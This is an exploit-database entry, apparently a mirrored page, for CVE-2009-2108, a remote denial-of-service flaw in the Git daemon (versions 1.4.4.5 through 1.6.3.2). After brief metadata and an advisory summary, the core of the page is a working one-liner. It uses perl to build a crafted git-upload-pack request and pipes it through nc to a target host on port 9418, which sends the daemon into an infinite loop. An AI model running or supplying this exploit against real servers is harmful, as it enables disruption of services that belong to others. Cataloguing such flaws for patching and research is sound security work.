[] NeoSense
E X P L O I T S
title author type platform port cve id

Git 1.6.3 - Parameter Processing Remote Denial of Service

Author: Shawn O. Pearce
type: dos
platform: linux
port: 
date_added: 2009-05-05 
date_updated: 2014-04-26 
verified: 1 
codes: CVE-2009-2108;OSVDB-55034 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/35338/info


Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests.

Attackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial-of-service condition.

Git 1.4.4.5 through 1.6.3.2 are vulnerable; other versions may also be affected.

$ perl -e '
$s="git-upload-pack git\0user=me\0host=localhost\0";
printf "%4.4x%s",4+length $s,$s
' | nc $GITHOST 9418
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.